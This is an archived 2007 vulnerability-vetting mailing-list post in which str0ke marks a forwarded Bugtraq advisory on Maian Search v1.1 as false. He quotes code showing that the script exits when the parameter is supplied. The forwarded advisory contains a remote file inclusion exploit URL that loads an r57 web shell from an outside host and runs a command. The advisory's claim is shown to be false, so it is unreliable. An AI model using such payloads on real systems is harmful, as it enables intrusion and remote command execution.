[VIM] false: Maian Search v1.1
str0ke
str0ke at milw0rm.com
Sat Apr 14 17:53:23 UTC 2007
The script contains the below, lines 18/20.
if (isset($_GET['path_to_folder'])) { exit; }
$path_to_folder = dirname(__FILE__).'/';
/str0ke
---------- Forwarded message ----------
From: k4rtal at gmail.com <k4rtal at gmail.com>
Date: 14 Apr 2007 15:24:03 -0000
Subject: Maian Search v1.1
To: bugtraq at securityfocus.com
###########################################################################
#
# Script Name : Maian Search v1.1
#
# Download : http://www.maianscriptworld.co.uk/freestuff_1975_search.html
#
# Coded by : KaRTaL
#
# Contact : k4rtal[at]gmail[dot]com
###########################################################################
#
# Include : include($path_to_folder.'inc/db_connection.inc.php');
#
#
# Exploit :
search.php?path_to_folder=http://sheladresin.com/r57.txt?cmd=id
#
#
###########################################################################
#
#
# Thankxz : D3ngsz | Ekin0x | Doublekickx | Cr at zy_King | M3rhametsiz | MaNaR
#
#
#
#
# Dengesiz Team
###########################################################################
More information about the VIM
mailing list